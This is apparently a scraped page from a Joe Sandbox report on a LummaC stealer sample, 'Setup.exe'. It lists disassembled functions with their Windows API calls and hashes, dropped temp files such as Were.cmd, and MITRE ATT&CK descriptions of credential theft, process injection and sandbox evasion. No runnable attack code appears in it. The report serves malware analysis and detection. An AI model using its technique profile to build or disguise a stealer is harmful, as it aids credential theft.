Instruction Fuzzy Hash: 8A11CE71501A25BAEB248B518C88FBBBBB8FF06791F10812AF54547100E3706894D7E0

Function 00A68475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A686E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00A6849D,?,00000000,?,?), ref: 00A686F7

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A684A0
htons.WSOCK32(00000000,?,00000000), ref: 00A684DD

Strings

255.255.255.255, xrefs: 00A684B8

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 54518ffb05efae90e062019ead69a3ea37ef9e8dba8c1b7a53b3ec05aa2983ed
Instruction ID: ae99fd3b0fddef4ab7546c49778ba1219878f113bbd8d5e9127681ae52100a2f
Opcode Fuzzy Hash: 54518ffb05efae90e062019ead69a3ea37ef9e8dba8c1b7a53b3ec05aa2983ed
Instruction Fuzzy Hash: 7811827510020AABDB10EF64D94AFAEB338FF44710F10462AF915572D1DF71A814C755

Function 00A499BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A01A36: _memmove.LIBCMT ref: 00A01A77

Part of subcall function 00A4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00A4B7BD

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A49A2B

Strings

ListBox, xrefs: 00A499F5
ComboBox, xrefs: 00A499CA

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 35e04df8c05674f99a0d8ef474efc5a6bc15d22e211b48300e1f21216b3130db
Instruction ID: ef32a31de5641976225bca35af3ada4d85daf9a888954ecbc9c863dc484b5c8a
Opcode Fuzzy Hash: 35e04df8c05674f99a0d8ef474efc5a6bc15d22e211b48300e1f21216b3130db
Instruction Fuzzy Hash: 0A01F575A42118ABCB14EBA4CD91CFF73A9AF92360B100619F861532C1EB305818C660

Function 00A5934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A59367
__fread_nolock.LIBCMT ref: 00A5937C

Strings

EA06, xrefs: 00A593AE

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: b4d1e185883ac79b823be68ee73e4057c2edd435da52faa1f39165a2186a8f59
Instruction ID: b156f0f19b1584551029a4b7a6d577639ef7d94e094551cc5dd2b0369e2f0bca
Opcode Fuzzy Hash: b4d1e185883ac79b823be68ee73e4057c2edd435da52faa1f39165a2186a8f59
Instruction Fuzzy Hash: 4501F972C04258BEDB18C7A8C856EFE7BF89B05311F00419EF592D6181E574A6088760

Function 00A498B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A01A36: _memmove.LIBCMT ref: 00A01A77

Part of subcall function 00A4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00A4B7BD

SendMessageW.USER32(?,00000180,00000000,?), ref: 00A49923

Strings

ListBox, xrefs: 00A498ED
ComboBox, xrefs: 00A498C2

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: fb7776cf2f9d734613e84779557f448b524a3100ff801b46cc65f472b6eaf344
Instruction ID: a0eb008bf9dac1bcbffb7a3585c7f38b010ef2b5e087ea352ddeb4128fb43933
Opcode Fuzzy Hash: fb7776cf2f9d734613e84779557f448b524a3100ff801b46cc65f472b6eaf344
Instruction Fuzzy Hash: 6C01DB75E421097BDB14EBA0DA52EFF73EC9F55340F100119B841632D2DB109E18D6B1

Function 00A4993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A01A36: _memmove.LIBCMT ref: 00A01A77

Part of subcall function 00A4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00A4B7BD

SendMessageW.USER32(?,00000182,?,00000000), ref: 00A499A6

Strings

ListBox, xrefs: 00A49972
ComboBox, xrefs: 00A49947

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: b5ddd253e1464f660294a4bd89e437f8564ad1ef0664c08dbec4963c2e249481
Instruction ID: 43556a05985ae3f4ce1cbf855c3d4cddf3e0c2e403e1a692b2e5aa66241e4d23
Opcode Fuzzy Hash: b5ddd253e1464f660294a4bd89e437f8564ad1ef0664c08dbec4963c2e249481
Instruction Fuzzy Hash: 4501DB76E421097BDB14EBA4CB52EFF73AC9F51340F100019B845632D2DB158E189671

Function 00A554E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00A55501
_wcscmp.LIBCMT ref: 00A55513

Strings

#32770, xrefs: 00A5550D

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: af2a13edac34221940b3a9a5635725d96542a604135af16e212953f4142bf806
Instruction ID: b0c51e5ead25f4841f13eee05864c676e9c0883ed0cec9b04dbffb4ea055ec3e
Opcode Fuzzy Hash: af2a13edac34221940b3a9a5635725d96542a604135af16e212953f4142bf806
Instruction Fuzzy Hash: A0E09B7250022927D720EA99AC49FA7F7ACEB55761F000157BD04D7051E660A94987E0

Function 00A48892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00A488A0

Part of subcall function 00A13588: _doexit.LIBCMT ref: 00A13592

Strings

AutoIt, xrefs: 00A48894
Error allocating memory., xrefs: 00A48899

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 8e6f18e01fc7428ea1a30063d8f910ae241590bbcc9cff21c04359adac15c8ac
Instruction ID: 7b56f8a8d33e7585da12d04c7c8dcb2417bada1aa3da74d1c6506e6ee88c9fb3
Opcode Fuzzy Hash: 8e6f18e01fc7428ea1a30063d8f910ae241590bbcc9cff21c04359adac15c8ac
Instruction Fuzzy Hash: B4D05B7238535836D25576E47E1BFDA7B489F09B51F004426FB08651C34AD585D183D5

Function 00A2B4F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00A2B544: _memset.LIBCMT ref: 00A2B551

Part of subcall function 00A10B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A2B520,?,?,?,009F100A), ref: 00A10B79

IsDebuggerPresent.KERNEL32(?,?,?,009F100A), ref: 00A2B524
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,009F100A), ref: 00A2B533

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A2B52E

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: e629cf79fac314ae4b5a47553bfcd5f036ef4d199c84d31bf8d04f5367f20b7b
Instruction ID: 63921377fffdecb32caa5b4fdaf40d321dea4ede20df528aad0bd1477d053a55
Opcode Fuzzy Hash: e629cf79fac314ae4b5a47553bfcd5f036ef4d199c84d31bf8d04f5367f20b7b
Instruction Fuzzy Hash: 38E06D702147218FD770DF69E904B867BF4AF04304F04892DE896CA341EBB4D548CBA1

Function 00A30251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00A30091

Part of subcall function 00A6C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00A3027A,?), ref: 00A6C6E7
Part of subcall function 00A6C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00A6C6F9

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00A30289

Strings

WIN_XPe, xrefs: 00A300A4

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: ad356bfa5bdf0e5a063dccc24d56e8ea97b67255b6089620ffe53a5d8b1e9aae
Instruction ID: ea208a88675ab201a7b5333148f3b24babacbfc1853a76e072eb53e551b60e84
Opcode Fuzzy Hash: ad356bfa5bdf0e5a063dccc24d56e8ea97b67255b6089620ffe53a5d8b1e9aae
Instruction Fuzzy Hash: 90F0C971805109DFCB69DBA4C9A8FEDBBB8AB09304F241485F146B21A0CB755F85DF21

Function 00A59EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00A59EB5
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00A59ECC

Strings

aut, xrefs: 00A59EC6

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 7cd8e6de1bb9f20f97fcbff6ad87d9a5efbedb4639867299e7b388d19d02cf39
Instruction ID: b14ad8e80caa8da8968459a9dc4a055e64b4bc83ef1a19cec29f112273695561
Opcode Fuzzy Hash: 7cd8e6de1bb9f20f97fcbff6ad87d9a5efbedb4639867299e7b388d19d02cf39
Instruction Fuzzy Hash: F8D05E7554030DBBDB90EBD0DC0EFDABB2CEB04700F0042A1BF58920A2EAB055998BA1

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\485687\Introduces.com

C:\Users\user\AppData\Local\Temp\485687\k

C:\Users\user\AppData\Local\Temp\Alive

C:\Users\user\AppData\Local\Temp\Bus

C:\Users\user\AppData\Local\Temp\Cardiff

C:\Users\user\AppData\Local\Temp\College

C:\Users\user\AppData\Local\Temp\Defects

C:\Users\user\AppData\Local\Temp\Diy

C:\Users\user\AppData\Local\Temp\Permitted

C:\Users\user\AppData\Local\Temp\Populations

C:\Users\user\AppData\Local\Temp\Shelter

C:\Users\user\AppData\Local\Temp\Were

C:\Users\user\AppData\Local\Temp\Were.cmd

Static File Info

Windows Analysis Report
Setup.exe

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295
windowclipboardmemoryCOMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
